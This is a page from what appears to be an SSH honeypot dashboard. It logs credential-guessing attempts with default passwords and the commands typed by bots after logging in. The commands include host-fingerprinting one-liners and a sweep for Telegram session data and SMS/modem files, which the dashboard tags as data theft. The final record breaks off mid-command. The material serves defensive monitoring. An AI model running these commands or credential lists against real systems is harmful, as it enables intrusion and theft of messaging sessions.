nonproductions.net banner
Logo
Subsystem: NO BONK

Adversarial Observation Interface

Page 62 / 4523 (226111 total records)
Passive Observation Node - Active Operational Overview
184.168.21.211
2026-07-03 01:57:34.512768 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: ideal

Record ID: 4eb30cc1e194
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "4eb30cc1e194",
  "src_ip": "184.168.21.211",
  "start_time": "2026-07-03T01:57:34.512768Z",
  "end_time": "2026-07-03T01:57:35.616177Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "ideal",
      "pass": "ideal123"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:56:41.941401 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sergey

Record ID: 4ec63714ef89
Client Version: SSH-2.0-Go
Engagement Duration: 2.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "4ec63714ef89",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:56:41.941401Z",
  "end_time": "2026-07-03T01:56:44.713029Z",
  "duration": "2.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sergey",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:53:18.101189 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: scheinas

Record ID: 61e93986f9c5
Client Version: SSH-2.0-Go
Engagement Duration: 2.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "61e93986f9c5",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:53:18.101189Z",
  "end_time": "2026-07-03T01:53:20.809789Z",
  "duration": "2.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "scheinas",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:49:50.599825 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sadygov

Record ID: 9607269d9922
Client Version: SSH-2.0-Go
Engagement Duration: 2.9s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "9607269d9922",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:49:50.599825Z",
  "end_time": "2026-07-03T01:49:53.509700Z",
  "duration": "2.9",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sadygov",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
118.26.110.171
2026-07-03 01:48:57.796431 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 10090a670d5b
Client Version: Unknown
Engagement Duration: 0.2s
{
  "id": "10090a670d5b",
  "src_ip": "118.26.110.171",
  "start_time": "2026-07-03T01:48:57.796431Z",
  "end_time": "2026-07-03T01:48:58.039549Z",
  "duration": "0.2",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
178.62.37.109
2026-07-03 01:46:26.898915 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: suvorova

Record ID: c0c07519dd19
Client Version: SSH-2.0-Go
Engagement Duration: 3.0s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "c0c07519dd19",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:46:26.898915Z",
  "end_time": "2026-07-03T01:46:29.934964Z",
  "duration": "3.0",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "suvorova",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:43:08.701903 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: star

Record ID: b80dbd12aaef
Client Version: SSH-2.0-Go
Engagement Duration: 2.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "b80dbd12aaef",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:43:08.701903Z",
  "end_time": "2026-07-03T01:43:11.432479Z",
  "duration": "2.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "star",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
14.103.127.23
2026-07-03 01:43:05.297582 UTC
SCORE: 10

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: a5e642decf82
Client Version: Unknown
Engagement Duration: 2m 0s
{
  "id": "a5e642decf82",
  "src_ip": "14.103.127.23",
  "start_time": "2026-07-03T01:43:05.297582Z",
  "end_time": "2026-07-03T01:45:05.402357Z",
  "duration": "120.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 10,
  "tags": []
}
144.202.92.17
2026-07-03 01:39:50.197897 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: fa760ada8f1e
Client Version: SSH-2.0-Go
Engagement Duration: 0.9s
HASSH Fingerprint: e54ef3ec27fe1fea7ab64d3fa05359fd
{
  "id": "fa760ada8f1e",
  "src_ip": "144.202.92.17",
  "start_time": "2026-07-03T01:39:50.197897Z",
  "end_time": "2026-07-03T01:39:51.083355Z",
  "duration": "0.9",
  "version": "SSH-2.0-Go",
  "hassh": "e54ef3ec27fe1fea7ab64d3fa05359fd",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
178.62.37.109
2026-07-03 01:39:44.298809 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: solne

Record ID: 718ba6585637
Client Version: SSH-2.0-Go
Engagement Duration: 2.6s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "718ba6585637",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:39:44.298809Z",
  "end_time": "2026-07-03T01:39:46.943881Z",
  "duration": "2.6",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "solne",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:36:16.300581 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: smbat

Record ID: fd3937f2b25c
Client Version: SSH-2.0-Go
Engagement Duration: 3.3s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "fd3937f2b25c",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:36:16.300581Z",
  "end_time": "2026-07-03T01:36:19.609518Z",
  "duration": "3.3",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "smbat",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:32:47.998535 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sin

Record ID: b4d3cc183fef
Client Version: SSH-2.0-Go
Engagement Duration: 2.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "b4d3cc183fef",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:32:47.998535Z",
  "end_time": "2026-07-03T01:32:50.836129Z",
  "duration": "2.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sin",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:29:26.298774 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: shmatov

Record ID: 272e8a322ad7
Client Version: SSH-2.0-Go
Engagement Duration: 3.1s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "272e8a322ad7",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:29:26.298774Z",
  "end_time": "2026-07-03T01:29:29.415829Z",
  "duration": "3.1",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "shmatov",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
185.242.3.195
2026-07-03 01:26:54.215726 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / 123root321

Remote entity achieved interactive shell state. Command sequence (1 executed):

[obs-node]:~$ echo OK
Record ID: 3043837f43b2
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "3043837f43b2",
  "src_ip": "185.242.3.195",
  "start_time": "2026-07-03T01:26:54.215726Z",
  "end_time": "2026-07-03T01:26:55.382068Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "123root321"
  },
  "commands": [
    "echo OK"
  ],
  "detailed_commands": [
    {
      "cmd": "echo OK",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:26:08.144392 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sharipov

Record ID: 832f843a259c
Client Version: SSH-2.0-Go
Engagement Duration: 3.3s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "832f843a259c",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:26:08.144392Z",
  "end_time": "2026-07-03T01:26:11.397381Z",
  "duration": "3.3",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sharipov",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:22:39.136694 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sereda

Record ID: d2fe3fce3ff0
Client Version: SSH-2.0-Go
Engagement Duration: 3.5s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "d2fe3fce3ff0",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:22:39.136694Z",
  "end_time": "2026-07-03T01:22:42.622229Z",
  "duration": "3.5",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "sereda",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:19:34.933023 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: schatrch

Record ID: 8a7bf308bc7a
Client Version: SSH-2.0-Go
Engagement Duration: 1.8s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "8a7bf308bc7a",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:19:34.933023Z",
  "end_time": "2026-07-03T01:19:36.775891Z",
  "duration": "1.8",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "schatrch",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
176.53.159.196
2026-07-03 01:17:08.423378 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: support / support

Record ID: 948f931f8b06
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "948f931f8b06",
  "src_ip": "176.53.159.196",
  "start_time": "2026-07-03T01:17:08.423378Z",
  "end_time": "2026-07-03T01:17:09.586139Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "support",
    "pass": "support"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:17:04.015410 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: saa

Record ID: aaaff099aeed
Client Version: SSH-2.0-Go
Engagement Duration: 1.7s
HASSH Fingerprint: 16443846184eafde36765c9bab2f4397
{
  "id": "aaaff099aeed",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:17:04.015410Z",
  "end_time": "2026-07-03T01:17:05.730468Z",
  "duration": "1.7",
  "version": "SSH-2.0-Go",
  "hassh": "16443846184eafde36765c9bab2f4397",
  "attempts": [
    {
      "user": "saa",
      "pass": "123456"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
178.62.37.109
2026-07-03 01:12:59.983010 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 494c47fe3f76
Client Version: Unknown
Engagement Duration: 0.1s
{
  "id": "494c47fe3f76",
  "src_ip": "178.62.37.109",
  "start_time": "2026-07-03T01:12:59.983010Z",
  "end_time": "2026-07-03T01:13:00.123753Z",
  "duration": "0.1",
  "version": null,
  "hassh": null,
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
5.239.41.161
2026-07-03 01:11:01.018980 UTC
COMMANDS RUN RECONNAISSANCE ROUTER TARGETING DATA THEFT SUCCESSFUL LOGIN SCORE: 530

Credential acceptance event recorded. Target authentication: root / root

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ /ip cloud print
Command not found: /ip cloud print
[obs-node]:~$ ifconfig
[obs-node]:~$ uname -a
[obs-node]:~$ cat /proc/cpuinfo
[obs-node]:~$ ps | grep '[Mm]iner'
[obs-node]:~$ ps -ef | grep '[Mm]iner'
[obs-node]:~$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
[obs-node]:~$ locate D877F783D5D3EF8Cs
[obs-node]:~$ echo Hi | cat -n
Record ID: 5431261daeeb
Client Version: SSH-2.0-libssh2_1.11.1
Engagement Duration: 1m 21s
HASSH Fingerprint: f45fb203c31069bb280067b71ed92ccb
{
  "id": "5431261daeeb",
  "src_ip": "5.239.41.161",
  "start_time": "2026-07-03T01:11:01.018980Z",
  "end_time": "2026-07-03T01:12:22.245236Z",
  "duration": "81.2",
  "version": "SSH-2.0-libssh2_1.11.1",
  "hassh": "f45fb203c31069bb280067b71ed92ccb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "root"
  },
  "commands": [
    "/ip cloud print",
    "ifconfig",
    "uname -a",
    "cat /proc/cpuinfo",
    "ps | grep '[Mm]iner'",
    "ps -ef | grep '[Mm]iner'",
    "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
    "locate D877F783D5D3EF8Cs",
    "echo Hi | cat -n"
  ],
  "detailed_commands": [
    {
      "cmd": "/ip cloud print",
      "failed": true,
      "error": "Command not found: /ip cloud print"
    },
    {
      "cmd": "ifconfig",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ps | grep '[Mm]iner'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ps -ef | grep '[Mm]iner'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
      "failed": false,
      "error": null
    },
    {
      "cmd": "locate D877F783D5D3EF8Cs",
      "failed": false,
      "error": null
    },
    {
      "cmd": "echo Hi | cat -n",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/ip cloud print"
  ],
  "score": 530,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "ROUTER TARGETING",
    "DATA THEFT",
    "SUCCESSFUL LOGIN"
  ]
}
45.148.10.151
2026-07-03 01:06:06.131160 UTC
SCORE: 0

Autonomous probing activity normalized. Remote entity established connection but deferred authentication.

Record ID: 9213b773587a
Client Version: SSH-2.0-PUTTY
Engagement Duration: 0.8s
HASSH Fingerprint: 5bd26477da5440a6187bd3f1b39a429c
{
  "id": "9213b773587a",
  "src_ip": "45.148.10.151",
  "start_time": "2026-07-03T01:06:06.131160Z",
  "end_time": "2026-07-03T01:06:06.912785Z",
  "duration": "0.8",
  "version": "SSH-2.0-PUTTY",
  "hassh": "5bd26477da5440a6187bd3f1b39a429c",
  "attempts": [],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": []
}
158.101.161.27
2026-07-03 00:41:23.282111 UTC
COMMANDS RUN RECONNAISSANCE ROUTER TARGETING DATA THEFT SUCCESSFUL LOGIN SCORE: 520

Credential acceptance event recorded. Target authentication: root / root

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ /ip cloud print
Command not found: /ip cloud print
[obs-node]:~$ ifconfig
[obs-node]:~$ uname -a
[obs-node]:~$ cat /proc/cpuinfo
[obs-node]:~$ ps | grep '[Mm]iner'
[obs-node]:~$ ps -ef | grep '[Mm]iner'
[obs-node]:~$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
[obs-node]:~$ locate D877F783D5D3EF8Cs
[obs-node]:~$ echo Hi | cat -n
Record ID: 869944732d99
Client Version: SSH-2.0-libssh2_1.11.1
Engagement Duration: 45.3s
HASSH Fingerprint: f45fb203c31069bb280067b71ed92ccb
{
  "id": "869944732d99",
  "src_ip": "158.101.161.27",
  "start_time": "2026-07-03T00:41:23.282111Z",
  "end_time": "2026-07-03T00:42:08.585576Z",
  "duration": "45.3",
  "version": "SSH-2.0-libssh2_1.11.1",
  "hassh": "f45fb203c31069bb280067b71ed92ccb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "root"
  },
  "commands": [
    "/ip cloud print",
    "ifconfig",
    "uname -a",
    "cat /proc/cpuinfo",
    "ps | grep '[Mm]iner'",
    "ps -ef | grep '[Mm]iner'",
    "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
    "locate D877F783D5D3EF8Cs",
    "echo Hi | cat -n"
  ],
  "detailed_commands": [
    {
      "cmd": "/ip cloud print",
      "failed": true,
      "error": "Command not found: /ip cloud print"
    },
    {
      "cmd": "ifconfig",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -a",
      "failed": false,
      "error": null
    },
    {
      "cmd": "cat /proc/cpuinfo",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ps | grep '[Mm]iner'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ps -ef | grep '[Mm]iner'",
      "failed": false,
      "error": null
    },
    {
      "cmd": "ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*",
      "failed": false,
      "error": null
    },
    {
      "cmd": "locate D877F783D5D3EF8Cs",
      "failed": false,
      "error": null
    },
    {
      "cmd": "echo Hi | cat -n",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/ip cloud print"
  ],
  "score": 520,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "ROUTER TARGETING",
    "DATA THEFT",
    "SUCCESSFUL LOGIN"
  ]
}
176.53.159.196
2026-07-03 00:16:57.467886 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: support / support

Record ID: 822a22ea8726
Client Version: SSH-2.0-Go
Engagement Duration: 1.2s
HASSH Fingerprint: eff4c24daffc8532c160e86e5f006e53
{
  "id": "822a22ea8726",
  "src_ip": "176.53.159.196",
  "start_time": "2026-07-03T00:16:57.467886Z",
  "end_time": "2026-07-03T00:16:58.626278Z",
  "duration": "1.2",
  "version": "SSH-2.0-Go",
  "hassh": "eff4c24daffc8532c160e86e5f006e53",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "support",
    "pass": "support"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
91.92.40.7
2026-07-03 00:11:51.821810 UTC
RECONNAISSANCE COMMANDS RUN SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / 1234567

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: 52db3780f66b
Client Version: SSH-2.0-Go
Engagement Duration: 2.7s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "52db3780f66b",
  "src_ip": "91.92.40.7",
  "start_time": "2026-07-03T00:11:51.821810Z",
  "end_time": "2026-07-03T00:11:54.486546Z",
  "duration": "2.7",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "1234567"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i 